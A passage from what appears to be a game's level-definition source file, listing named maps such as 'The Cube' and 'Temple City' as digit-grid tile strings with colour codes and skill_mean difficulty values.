0000000010000000000000000000000000_00010000000000000000000111110000000000000000000000000000000000000000000000000000_00000000000000000000001110111000000000000000000000000000000000000000001000000000_00000000111000000000001111101000000000000000000000000000000000000000011100000000_00000001110100000000001111111000000000000000000000000000000000000000001000000000_00000001111100000000000111110000000000000000000000000000000000000000000000000000_00000001111100000000100011100000000000000000000000000000000000000000000000000000_00000000111000000001110000000000000000000000001000000000000000100000000000000000_00000000000000000000100000000000000000000000011100000000000001110000000000000000_00000000000000000000000000000000000000000000001000000000000000100000000000000000_00000000000000000000000000000000000000010000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000111000000000000000000000000_00000000000000000000000000000000000000000000000000011111110000000000000000000000_00000000000000000000000000000000000000000000000000111111111000000000000000000000_0000000000000000000000000000000000000000000000000111101111
1100000000000000000000_00000000000000000000000000000000000000000000000001111111111100000000000000000000_00100000000000000000000000000000000000000000000011101111111110000000000000000000_00000000000000000000000000000000000000000000000011111111111110000000000000000000_00000000000010000000000000000000000000000000000011111111111110000000011000000000_00000000000111000000000000000000000000000000000001111111111100000000111100000000_00000000001111100000000000000000000011000000000001111011111100000000111100000000_00000000000100000000000000000000000110100000000000111111111000000000011000000000_00000000000120111100000000000000000111100000000000011111110000000000000000000000_00000000000111111111100011000000000011000000000000000111000000000000000000000000_00000000011111111111111011111000000000000000000000000000000000000000000000000000_00000000111111111111011101110000000000000000011000000000000000000000000000000000_00000001111110111111111110110000000000000000111100000000000000000000000000000000_00000011111111111111110111100000000000000000111100000000000000000000000000000000_00000011111111111111111111000000000000000000011000000000000000000000000000000000_00000111111111111111111111100000000000000000000000000000000000000000000000000000_00000111111111111110111111100000000000000000000000000000000000000000000000000000',\n skill_mean: 22,\n ),\n Map.new(\n name: 'Shadow of Valus',\n data: 'color_ffeecc-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000050000000000000000000000000000000000000_00000000000000000000000000000000500000000010000000000000000000000000000000000000_00000000000000000000000000000000100000001010500000000000000000000000000000000000_00000000000000000000000000000010100000011110100000000000000000000000000000000000_00000000000000000000000000000011111111111111100000000000000000000000000000000000_00000000000000000000000000000111111111111111111000000000000000000000000000000000_00000000000000000000000000101111111111111111111111000000000000000000000000000000_00000000000000000000000000111111111111111111111111100000000000000000000000000000_00000000000000000000000000111111111111111111111111111100000000000000000000000000_00000000000000000000000001111111111111111111111111111111100000000000000000000000_00000000000000000000000011111111111111111111111111111111111500000000000000000000_00000000000000000000000011111111111111111111111111111111110000000000000000000000_00000000000000000000000111111111111111111111111111111111110000000000000000000000_00000000000000000000000111111111111111111111111111111111111000000000000000000000_00000000000000000000000111111111111111111111111111111111111000000000000000000000_00000000000000000000000111111111111111111111111111111111111100000000050000000000_00000000001000000000000111111111111111111111111111111111111111000000010500000000_00000000000000000000000011111111111111111111111111111111111111111000010100000000_00000000000000000000000011111111111111111111111111111111111111111110011100000000_00000000000000000000000001111111111111111111111111111111111111111111011110000000_00000000000000000510000001111111111111111111111111111111111111111111111111000000_00000000000000000011000001111111011111101111111111111111111111111111111111100000_000000000000000000100000001111111111111111111
11111111111111111111111111111100000_00000000000000000000000000111111111111111111111111111111111111111111111111110000_00000000000000000000000000111111111111111111111111111111111111111111111111110000_00000000000000000000001000111111111111111111111111111111111111111111111111110000_00000000100000000000000000111111111111111111111111111111111111111111111111110000_00000000000000000000000000411111111111111111111111111111111111111111111111115000_00000000000000000000000000411111111111111111111111111111111111111111111111115000_00000000000000000000000000041111111111111111111111111111111144411111111111115000_00000000000000000001000000041111111111111111111111111114444444441111111111110000_00000000000000000001100000004411111111111111111111111114000000004111111111110000_00000000000000000005100050000441111111111111111111111300000000000441111111110000_00110000000000000005100005000411111111111111111111111110000000000041111111100000_00111000000000000005000000000111111111111111111111111111000000000011111111110000_00511000000000000000000000000111111111111111111111111111100000000011111111110000_00015000000010000000000000001111111111111111111111111111100000000001111111100000_00010000000000000000000001111111111111111111111111111111100000000011111111110000_00000000000000000000000000111111111111111111111111111111100000000001111111100000_00000000000000000000000001111111111111111111111111111111100000000011111111100000_00000000000000000000000011111111111111111111111111111111100000000111111111100000_00000000000000000000001111111111111111111111111111111111100000011111111111110000_00000000000000000000000111111111111111111111111111111111110000011111111111110000_00000000000000000000000111111111441111111111111111111111110000111111111111111000_00000000000001111000000111111111444111111111111111111111110000111111111111111000_00000000000005110000001111111110004111111111110111111111110000111100111111111000_00000000000000510000001111111111004111111111000111111111110000111100111111111000_00000000000000010000001111111111004111111110000111111111110000111001111111111000_00000000000000000000001111111111004111111110000111111111110000011111111111110000_00000000000000000000001111111111001111111110000011111111100000000111111111100000_00000000000000000000000111111111001111111100000011111111100000000111111111000000_00000000000000000000000111111111001111111000000011111111100000000001111110000000_00000021100000000011000011111100001111111000000001111111110000000000000000000000_00000111000000000050000000000000011111111000000001111111110000000000000000000000_00000101000005500000050000000000011111111000000000111111111000000000000000000000_11111111111111111111111111111111111111111111111111111111111111111111111111111111',\n skill_mean: 25,\n ),\n Map.new(\n name: 'The Cube',\n data: 
'color_d2eed7-11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111110001000111111000000001111110000000011111100000000111111000000021_11111111111111110101010111111000000001111110000000011111100000000111111000000001_11111111111111110101010111111005555001111110055550011111100000000111111004444001_11111111111111114141414111111005555001111110055550011111100000000111111004444001_11111111111111114141414111111005555001111110055550011111100004444111111004444001_11111111111111110101010111111005555001111110055550011111100004444111111004444001_11111111111111110101010111111000000001111110000000011111100004444111111000000001_11111111111111130100010111111000000001111110000000011111100004444444000000000001_11111111111111111111110111111111111111111111111111111111111111114444000011111111_11111111111111100044000111111111111111111111111111111111111111114444000011111111_11111111111111101111111111111111111111111111111111111111111111114444000011111111_11111111111111100044000111111111111111111111111111111111111111110000000011111111_11111111111111111111110111111111111111111111111111111111111111110000000011111111_11111111111111100044000111111111111111111111111111111111111111110000000011111111_14444444411111101111111111111000000001111110000000011111100000000000000000000001_14411114411111100044000111111000000001111110000000011111100000000111111000000001_14111111411111111111110111111005555001111110044440011111100000000111111000000001_14151151411111100044000111111005555001111110044440011111100000000111111000000001_14111111411111101111111111111005555001111110044440011111100005555111111000055551_14114411411111100044000111111005555001111110044440011111100005555111111000055551_14444444411111111111110111111000000001111110000000011111100005555111111000055551_14444444000000000000000111111000000000000000000000011111100005555555000000055551_11111111000000001111111111111111111100000000111111111111111111115555000011111111_11111111000000001111111111111111111100444400111111111111111111115555000011111111_11111111000000001111111111111111111100444400111111111111111111115555000011111111_11111111000000001111111111111111111100444400111111111111111111110000000011111111_11111111000000001111111111111111111100444400111111111111111111110000000011111111_11111111000000001111111111111111111100000000111111111111111111110000000011111111_11111111000000000000000111111000000000000000000000011111111111110000000000055551_11111111111111100000000111111000000001111110000000011111111111111111111000055551_11111111111111100000000111111004444001111110000000011111111111111111111000055551_11111111111111100000000111111004444001111110000000011111111111111111111000055551_11111111111111100005555111111004444001111110000555511111111111111111111000000001_11111111111111100005555111111004444001111110000555511111111111111111111000000001_11111111111111100005555111111000000001111110000555511111111111111111111000000001_11111111000000000005555555000000000001111110000555555500001111110000000000000001_11111111000000001111115555000011111111111111111111555500001111110000000011111111_1111111100000000111111555500001111111111111111111155550000
1111110000000011111111_11111111000055551111115555000011111111111111111111555500001111110000000011111111_11111111000055551111110000000011111111111111111111000000001111110000555511111111_11111111000055551111110000000011111111111111111111000000001111110000555511111111_11111111000055551111110000000011111111111111111111000000001111110000555511111111_11111111000000000000000000000000000001111110000000000000000000000000555555500001_11111111111111100000000111111000000001111110000000011111100000000111111555500001_11111111111111100555500111111004444001111110044440011111100000000111111555500001_11111111111111100555500111111004444001111110044440011111100000000111111555500001_11111111111111100555500111111004444001111110044440011111155550000111111555500001_11111111111111100555500111111004444001111110044440011111155550000111111000000001_11111111111111100000000111111000000001111110000000011111155550000111111000000001_11111111111111100000000111111000000000000000000000011111155550000000000000000001_11111111111111111111111111111111111100000000111111111111111111110000000011111111_11111111111111111111111111111111111100000000111111111111111111110000000011111111_11111111111111111111111111111111111100000000111111111111111111110000000011111111_11111111111111111111111111111111111100000000111111111111111111110000000011111111',\n skill_mean: 27,\n ),\n Map.new(\n name: 'Temple City',\n data: 'color_cfcfe6-00000000000000000000000000000000000000000000000000000000000000000000000000000002_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000044000000000000000000000000000_00000000000000000000000000000000000000000000111111144000000000000000000000111111_00000055000000000000000000000000000000000005511111111000000000000000011111111111_00000000550000000000000444000000000000055555511111111000000000005555111111111111_00000000055500000000000044400000000000555555551111111000000000000055555555511111_00000000000550000000000000000000000000000000055551111000000000000000000005555111_00000000005555555000001111111111000000000000000000000000000000000000000000000000_00000000000005555555511111111100000000000000000000000000000000000000440000000000_00000000000000055555511111111000000000000000000000000000555111111111440000000000_00000000000000000005551111110000000000000000000000000055555511111111110000000000_55500000000000000000055111000000000000000000000000000000005555111111110000000000_05555511100000000000000000000000000000000000000000000000000055551110000000000000_00051111000000000000000000011100000000000000000000000000000000000000000000000000_00005110000000000000000000551100000005511110000000000000000000050550000000000000_00000000000000000000000000000000000000051100000000000000000005555555000050000000_00000000000000000000000000000000055500000000000000000000000555555555555500000000_00000000000000000055551100555555555555000000000000000000555550005005055550050000_00000000000010100000555555555055101555505550000000000505550050000000005555555005_00000000000110110000555555500001101100555555550550055555550000000000000000555555_00000000000110110055550000000001101100005555555555555555500000000000000000005505_00000000011110111155500000000111101111000000550005555500000000000000000000000555_00000000011500051150000000000115000011000000000005550000000000000000000000000005_0000000001150055115000000000000000051100000000005
5500000000000000000000000000000_00000555011500051100000000005110000511000000005055000000000000000000000000000000_50555551111100111111100055111111100111110000000550500000000000000000000000000000_55055551150001151441100005114415110000110000005500000000000000000000000000000000_55550551150011551441100000114415511000110000555500000000000000000000000000000000_55555551100110051441100000114415001100110055555000000000000000000000000000000000_55000001100000001441100000114410000000110005550000000000000000000000000000000000_00000001111000001441100000114410000011115555550000000000000000000000000000000000_00000001101100001441100000114410000115115555000000000000000000000000000000000500_00000001100110000001100000110000001155115000000000000000000000000000000000005500_00000001111111011111100000111111011151115000000000000400400400000000000055505000_00000001100400001441100000114410000555150000000000000101110100000000000050550000_00000001100400001441150000114410000555510000000000000111511100000000000000055550_00000001104440001441150000114410005550115000000000040001510004000000000000005550_00000001100400001441100000114410005500115500000000010111511101000000000005505050_00000001100000001441150000114410055000100555000000011155555111000000000555055000_00000001100000001441155000114410050000000005000004000111111100040000005000055000_00000001100000000001100000110000000000110000000001011155555111010000005500005050_00000001111001111111100000111111110011110000000001110000000001110000000000055500_00500001101100051551100055115515000115110000000400011111111111000400000000005500_05500001100110051551100005115515001155110000000101114444444441110100000000000500_05505001111111011111100000111111011111110000000111000000000000011100000000000500_00555001100400000001100000110000000400110000000010040040004004001000000000005500_00500001100400000001100000110000000400115000000010010010001001000000000000055500_00500001104440000001100000110000004440115000000111111111011111111100000000555000_00500001100400000501100000110000000400115500001111111111011111111110000005555500_11111111100000005500000000000000000000111111111111111111011111111111111111111111_11111111111111111111111111111111111111111111111111111111011111111111111111111111_11111111111111111111111111111111111111111111111111111111011111111111111110000011_11111111111111111111111111111111111111111111111111111111011100110011001110030011_11111111111111111111111111111111111111111111111111111111000000000000000000111011_11111111111111111111111111111111111111111111111441144111011111111111111111111111_11111111111111111111111111111111111111111111111440044000011111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111',\n skill_mean: 30,\n ),\n Map.new(\n name: 'Moon Launcher',\n data: 
'color_7070ae-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000050000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000005000000000050000000000000000000000050000000000000005000000000000_00000000000000000000000000000000000050000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000005000_00000000005000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000011100000000000000000000000000_00000000000000000000500000000000000000000000000000111110000000000000000000000000_00000000000000000000000000000000000000000000000001101111000050000000000000000000_00000000000000000000000000050000000000000000000001111011000000000000000000000000_00000000000000000000000000000000000000000000000001101111000000000000044440000000_00000000000000000000000000000000000000000004000000111110000000000000411114400000_00000000000000000000000000000000000000000004000000011100000000000000111111140000_05000000000000000000000000000000000000000004000000000000000000000000000111114000_00000000000000000000000000000050000000000000000000000000000000000000000011111000_00000000000000000000000000000000000000000004000000000050000000000000000011111400_00000000500000000000500000000000000000000000000000000000000000000000000001111100_00000000000000000000000000000000000000000000000000000000000000000000000001111100_00000000000000000000000000000000000000000004000000000000000000000000000001111100_00000000000000000000000000000000000000000000000000000000000000000000000001111100_00000000000000000000000000000000000000000000000000000000000000000000000011111000_00000000000000000000000000000000000000000000000000000000005000000000000011111000_00000000000005000000000000000000005000000004000000000000000000000000030111110000_00000005000000000000000000000000000000000000000000000000000000000000111111100000_00000000000000000000000000000000000000000000000000000000000000000000011110000000_00000000000000000000000000000000000000000010100000000000000000000000000000005000_00000000000000000000000000000000000000000114110000000000000000000000000000000000_00000000000000000000000000005000000000000110110000000000000000000000000000000000_00000000000000000000000000000000000000000110110050000000000000000000000000000000_00000000000000000000000000000000000000000110110000000000000000000000000000000000_00000000000000000000000000000000000000000114110000000000000500000000000000000000_00000000000000000000000000000000000000000110110000000000000000000000000000000000_00000500000000000000000000000000000000000010100000000000000000000000000000000000_00000000000000000000000050000000000000000114110000000000000000000000000000000000_00000000000000000000000000000000000000000010100000000000000000000000000000000000_00000000000000000000000000000000000000000110110000000000000000000000000000000000_00000000000000000000000000000000000000000014100000000000000000000000000000000000_00000000000000000000000000000000000000000110110000000000000000000000000000000000_00000000000000000000000000000000000000000010100000000000000000000000000000000000_00000000000000000000000000000000000000000014100004440000000000000000000000000000_00000000000000000000000000000000000000000010100000000000000000000000000000000000_00000000000500000000000000000005000000000010100000000000000500005000000005000000_00000000000000000000000000000000000000000014100000000000000000505000000000000000_0000000000000000000000000000000000000000001010550000005111
1111111111111111111101_05000000000000000000000000000000000000055014105500000051115101515101010101010001_00000000000000000000000000000000000000055010105500000051010000005000000000010111_00000000000000000000000000000000000000011014101100000000000000000000000101010001_00000000000000000000000000000000000000011010101100000000000000000000000111011101_00000000000000000000000000000000000444011004001100000000004400000000000001010001_00000000000000000000000000000000000444011111111101111111111100000000000001010111_00001001110101011010110101010001100111011111111100100001001100044000000001000001_00001001110101011110100111011001110111111110111100100411000000011000000001010111_00001101010111010110110101011101010010011510151101110001000011111111100001010001_00000000000000000000000000000000000010011510151101110411000011010000000001011101_11111111111111111111111111111111111111111510151100000001000000010000000001010001_00000000000000000000000000000000000000011511151100000411000000010000000001010111_00000000000000000044400000004440000000111111111110000001000500010000050001010001_00000000000000000000000000000000000000111110111110000411055550010005555551011101_02000000000000000000000000000000000000000000000000000001555555515555555511110001_11111111111111111111111111111111111111111111111111111111111111111111111111111111',\n skill_mean: 32,\n ),\n Map.new(\n name: 'Garden of Giants',\n data: 'color_ecbfc4-00000000000000000000000000000000000000000000000000000000000000000000000444410000_00000000000000000000000000000000000000000000000000000000000000000000000044410000_00000000000000000000000000000000000000000000000000000000000000000000000004410000_00000000000000000000000000000000000000000000000000000000000000000000000000410000_00000000000000000000000000000000000000001000000000000000000000000000000000010000_00000000000000000000000000000000000000001000000000000000000000000000000000010000_00000000000000000000000000000000000000001000000000000000000000000000000000010000_00000000000000000000000000000001000000001000000000000000000000000000000000010000_00000000000000000000000000000001000000000000000000000000010000000000000000000000_00000000000000000000000000000001000000000000000000000000010000000000000000000000_00000000000000000000000000000001000000000000000000000000010000000000000000000000_00000000000000000000000000000001000000000000000000000000010000000000000000000000_00000000000000000000000000000000000000000000000000000000010000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000100000000000000000000000000000004400000000_00000000000000000000000000000000000000100000000000000000000000000000001100000000_00000000000000000000000000000000000000100000000000000000000000001000001101000000_00000000000000000000000000000000000000100000000000000000000000001000001111100000_00000000000000000000000000000000000000100000000000000000000000001000001110110000_00000000000000000000000000000000000000100000000000000000000555000000001100011000_00000000000000000000000000000000000000100000000000000000005505500000011001001100_00000000000000000000000000000000000000100000000000000000055000550000111011101110_00000000000000000000000000000000000000000000000000000000005050050000001011100000_00044440000000000000000000000000000000000001000000000000005550050000001011101000_00444400000000000000000000000000000000000001000000000000000000055000001000001000_00044000000000000040000000000000000000000000
000000000000000000055000001000001001_00000000000000000000000000000000000000000000000000000014000000050000001110111001_10000000110000000000000000000000000000000000000000000014000000550000001110111011_10000001100000000000000000000000000000000000000000000014000000550000000010100011_10000011000000000000000000000000000000000000000000000014000055555000000010100011_10000110000440000000000000000000000000000000000000000014000555555000000010100011_11100000000444000000000000005000000000000000000000000014000550005500000010111111_10110000000000000000000000005500000000000000000000000014005550505500000010000001_10011000000000000000000000000500000000000000000000000014005550505500000010000001_10001100000000000000000000000500000000000000000005550014005550555000000011111101_10000000110000000000000000000501111444000000000050050014005550000000000011111101_10000001100000000000000000000500011111440000000050000014000550000000000001110101_10000011000000000000000000000550001011110000000005555014000505000000000000110101_10000110000000000000000000000050000010000000000000500514000555000000000000110001_11100000000000000000000000000055000010000000000005505514000055500005555000010001_10110000000000000000000000000005000000000000000005500010005055500055055555000001_10011000000000000000000000000005000000000000000000550010005005505550005555500001_10001100000000000000000000000005000000000000000000005010050005555500000005500001_10000000110000000000000000000005000000000000000000005515005055555000000005550001_10000001100000000000000000000055000000000000000000000515005555550000000000550001_10000011000000000000000000000050000000000000000000005015505550550000000300550001_10000110000000000000000000000050000000000000000000055015505000550000011100050001_11100000000000000000000000000050000000000000000500050555555000550000110000050001_10110000000000000000000000000055000000000000000500055055555500050001100000550001_10011000000000000000000000000055500000000000000500505555555550550000000005500001_10001100000000000000000000000005500000000000005500555055500505050000005555000001_00000000110000000000000000000000500000000000005000055055555005550000000555000001_00000001100000000000000000000055550000000000055500050555505055050111000000000001_20000011000000000050000000000055550000000050055000550555005555550001100000000001_11111110000005000050000000000055155000000555005500000555555055550000110000000001_10050050000055005550050000005005555005005515005055015555055555555500011000000001_10555055500050555050555005550515015505550501000555555555005005050500001100000001_10555555555050555555055055505555555115055100550510555555015505555505000110000001_15555555555555555555555555515555555555550505505055500155505550055055500011111111',\n skill_mean: 34,\n ),\n Map.new(\n name: 'Pyramid Dimension',\n data: 
'color_c17c7a-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000555555555555555555555555555000000000000000000000000000_00000000000000000000000000055555555555555555555555550000000000000000000000000000_00000000000000000000000000005555555555555555555555500000000000000000000000000000_00000000000000000000000000000555555555555555555555000000000000000000000000000000_00000000000000000000000000000055555555555555555550000000000000000000000000000000_00000000000000000000000000000005555555555555555500000000000000000000000000000000_00000000000000000000000000000000555555555555555000000000000000000000000000000000_00000000000000000000000000000000055555555555550000000000000000000000000000000000_00000000000000000000000000000000005555555555500000000000000000000000000000000000_00000000000000000000000000000000000555555555000000000000000000000000000000000000_00000000000000000000000000000000000055555550000000000000000000000000000000000000_00000000000000000000000000000000000005555500000000000000000000000000000000000000_00000000000000000000000000000000000000555000000000000000000000000000000000000000_00000000000000000555555555555555000000050000055555555555555555550000000000000000_00000000000000000055555555555550000004444400005555555555555555500000000000000000_00000000000000000005555555555500000440050044000555555555555555000000000000000000_00000000000000000000555555555000004400050004400055555555555550000000000000000000_00000000000000000000055555550000004400050004400005555555555500000000000000000000_00000000000000000000005555500000001100050001100000555555555000000000000000000000_00000000000000000000000555000000000100010001000000055555550000000000000000000000_00000000000000000000000050000000000100010001000000005555500000000000000000000000_00000000000000000000000000000000000100010001000000000555000000000000000000000000_00000000000000000000000000000000000144414441000000000050000000000000000000000000_00000000000000000100000000000000000144414441000000000000000004000000000000000000_00000000000000001110000000000000000144414441000000000000000044400000000000000000_00000000000000011111000000000000000144414441000000000000000444440000000000000000_00000000000000111111100000000000000100414001000000000000004444444000000000000000_00000000000005555555550000000000000100414001000000000000011111111100000000000000_00000000000000555555500000000000000100414001000000000000001111111000000000000000_00000000000000055555000000000000000102414001000000000000000111110000000000000000_00000000000000005550000000500000000111111111000000004000000011100000000000000040_00000000000050000500000005550000000000010000000000044400000001000050000000000440_00000000000555000000000055555000000000111000000000444440000000000555000000004440_00000000005555500000000555555500000001111100000004444444000000005555500000044440_00000000055555550000001111111110000011111110000011111111100000055555550000111110_00000000555555555000000111111100000111111111000001111111000000555555555000011110_00000005555555555500000011111000001111111111100000111110000005555555555000001110_00000055555555555550000001110000011111111111110000011100000055555555555000000110_00000555555555555555000000100000111111111111111000001000000555555555555005000010_00005555555555555555500000000001111111111111111100000000005555555555555005500000_00055555555555555555550000000011111111111111111110000000055555555555555005550000_00555555555555555555555000000111111111111111111111000000555555555555555005555000_0555555555555555555555550000111111111111111111111110000555
5555555555555005555500_55555550555555555555555550011111111111111111111111110055555555555555555005555550_55555500055555555555555555111111111111111111111111111555555555555555555005555555_00000001000000005500000000000000000000000000000000000000000000000000000001000000_00000011100000005500000000000000000000000000000000000000000000000000000001100000_00000113110000005500111111111111100000000000001111111111111000000000000001110000_00110000000110005500011111111111000000000000000111111111110000000000000001111000_04144441444414005500011111111110000000015000000011111111100000001000000001111100_04144411144414005000010111111100000000115500000001111111000000011000000001111110_04144111114414005000010011111000000001115550000000111110000000111000000001111111_04141115111414000000010001110000000011115555000000011100000001111000000001111111_04111151511114000000010000100000000111115555500000001000000011111000000001111111_04111515151114000000010000000000001111115555550000000000000111111000000001111111_01111111111111000000010000000000011111115555555000000000001111111000000001111111_00555555555550000000010000000000000000000000000000000000000000000000000001111111_00055555555500000000010000000000000000000000000000000000000000000000000001111111_00005555555000000000000000000000000000000000000000000000000000000000000000000000',\n skill_mean: 38,\n ),\n Map.new(\n name: 'Diving with Whales',\n data: 'color_6c87d6-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000555500000000000000000000000000000000000000_00000000000000000000000000000000000055000550000000000000000000000000000000000000_00000000000000000000000000000000000050000550000000055555000000000000000000000000_00000000000000000000000000000000000050005500000000550005500000000000005555500000_00000000000000000000000000000555000055000000000000550000550000000000055555550000_00000000000000000100000000000500500005550000000000550000550000000000555505550000_00200000000000000110000000000000500000005555555000055000550000000055500000055000_00100000000000000111100000000000500000000000000000000000550000505550000000005000_00110000000000001144100000000000500055500000000000000005500000000000000500050000_00011000000000001140110000000005000550050004000055555555000000000000000055500000_00001100000005001400110000005550005500000041000000000000000000000000000000000000_05000110001105511010111055555550005500000411000000000000000000000000000000000000_05550110111115110100111055050500005500004111000000000000000000000000000000000000_00055511100411101100000055005500000550001111000000000000000000000000000000000000_00005511004011101000111055500500000555000001030000000000000000000000000055500005_50050110040111011000115555555550115555501111111000550001110000000000000555000555_05555100401110010000115555115555555555555111115555555511111111110000055055555555_55551104011110100051155555555555555555555555555505501111111111111100000000055055_00011040011101100551155055505550000000055555500050011111111111111111000000000000_55510400111411000511000000000000000000000000000500111111111111111111111000000000_50011001114010000111000500000000000000000000005501111111111000001111111100000000_55501100040000110110500000000000000000000000055011111111100000000001110000000000_00005110400001155100000000000000000000000000055011111111100000000001110000000000_05505110000011551100000000000050000000000000050111111111100000000000111000000000_00501100001115511055550005555005500000000000050111111111110000000000000000000000_555010000110001115500555000000000000055000
00501111111101111000000000000000000005_50010000000000000000000000000000005555000000501111111000111000000000000000000555_00115000000001100000000000000055550000000005001111110000000000000000000000055550_01155555000011000000000005505500000000000000001111100000000000000000000000000000_11555555555110000000000000000000000000000000000110000000000000000011110000000000_11111555511100000000000000000000000000000000055500000000000000001111100000000000_00111111110000000000055555555500000000000055500000000000000000011111100000000000_00000000000000000000111111115555500055005550000000000000000011111111000000000000_00100000000000000011111111111155555500555000000000000000001111111111110000000000_01111000000000000111111111111111555555000000000000000001111111111111111000000000_00100000000000000111111111111111100000000000000000000111111111111011111100000000_00000000000000000011111111111111111000110000000001111111111111100000011110000000_00000000000000000001111111111111111111111100000111111111111110000000000000000000_00000000000000000000011111111111111111111111111111111111111000000000000000000000_00000000010000000000001111111111111111111111111111111111110000000000000000000000_01000000111100000000000111111111111111111111111111111111100000000000000000000000_00000000010000000000000011111111111111111111111111111111000000000000000000000000_00000000000000000111000011111111111111111111111111111110000000000000000000001000_00000000000000000011100001111111111111111111111111111100000000000000000000011110_00001100000000000000000000111111111111111111111111110000000000000000000000001000_00000000000000000000000000011111111111111111111111000000000000010000000000000000_00000000000000000000000000011111111111111111111100000000000000000000000000000000_00000000000010000000000000011111111111111111110000000000000000000000000000000000_00000000000111110000000000011110011110000000000000000000000000000000000000000000_00000000000010000000000000011100011110000000000000000000001000000000000000000000_00001000000000000000000000111100011100000000000000000000000000000000000000000000_00011110000000000000000000111100011100000000000000000000000000000001000000000000_00001000000000000000000000111000011110000000000000001000000001000000000000000000_00000000001110000000000000011000001110000000000000011110000000000000000000000000_00000000001000000000000000000000000110000000000000001000000000000000000010000000_00000000000000000000000000000000000000000000000000000000001000000000000111100000_00000001000000000000000000000000000000000000000000000000011110000000000010000000_01000000000000000000000111000000000000011000000000000000001000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000',\n skill_mean: 40,\n ),\n Map.new(\n name: 'The Astral Ascent',\n data: 
'color_ff6666-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000050000000000000000000000000005000000000000000000000000000000_00000000000000000000000000000000004000000000000000000000000000000000000000000000_00000005000000000000000000000000000004000000000000000000000000000000000500000000_00000000000000000000000000000040000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000005000000000000000000000_00050000000000000000000000004000000000000000000500000000000000000000000000000000_00000000000000000040000000000000000000000000000000000000000000000000000000000000_00000000000000000400000000000000000000040000000000000000000000000000050000000000_00000000000000000000000000111100000000040000000000000505000055000000000000000000_00000000050000000000000005511500000000040000000000005555555500000000000000000000_00000000000000000000005555555505000000040000000500055550555555555000000000000000_00000000000000000000055500005055000000000000000505055550000005055500000000050000_00000000000000030000550000000005555000000000555555555500000000005550000000000000_00005000000001111155050000000400055501101100055550000000000000000050000000000000_00000000000001000155000000000000005550101000555500000000000000000050000000000000_00000000000001020150000000000000000550101005555050000000000000000050000000000000_00000000000041000150000000000000000555101005555000000005000000000000000000000000_00000000000011141110000000041114000051101105550000000000000000000000000000000000_00000000000001000100000000000100000555101555550000000000000000000000000000500000_00000005000001141100000000000100000055101555550000000000000000000000000000000000_00000000000001000100000000000100000005101555555500000000000050000000000000000000_00000000000001141100000000004100000055101555550000000000000000000000000000000000_00500000000041000100040000040100000005101555000000000500000000000005000000000000_00000000000011141110110000011111400001101100000000000000000000000000000000000000_00000000000001000000155555511111400555101555550000000000000000000000000000000000_00000000000001111111155555511111400055101555550500000000000000000000000000000000_00000000000005555500040044004400005555101555555050000000050000000000000000000000_00000500000005555500000000000000005555101555555505000000000000000000000000000000_00000000000005555500550055005500555555101555555055550000000000000000000000000000_00000000000005555500551155115511555555101555555555555500000000000000500000000000_00000000005005555500551155115511555555101555555555555550000000000000000000000000_00000000000005555500000044004400000400101555555505555500000000000000000000005000_00000000000005555500000000000000000000101555555505505050000000000000000000000000_00050000000005555511004055005500555000101555555550500055500500005550000000000000_00000000000005555511001155115511555000001555555555505505555055555005550000000000_00000000000005555500001155115511555111111555505500555055050000000000005000000000_00000000000005055500000005555555555555555555555505555555505000000000000000000000_00000000500000050500000005555555055555555555500555505505500000000000000000000000_00000000000000000500000000055555500005555505000000055505055505500000000000000000_00000000000000000500000000000500055500050000000000005055000555000000500000000000_00005000000000000000000000000000000000000000000000000055000000500000000000000000_00000000000000000000005000000000000000000000000000000050000000055500000000000000_0000000000000000000000000000000000000000000000000005550000
0000000550000000000000_00000000000000500000000000000000000000000000500000055500000000000050000000000000_00000000000000000000000005000000000000000000000000555000000000000055000000050000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000005000000000000000000000000000000000000000000_00000005000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000500000000000000000000_00000000000000000050000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000500000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000500000000000000000500000000_00005000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000050000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_55555555555555555555555555555555555555555555555555555555555555555555555555555555',\n skill_mean: 44,\n ),\n Map.new(\n name: 'Mothership Warp',\n data: 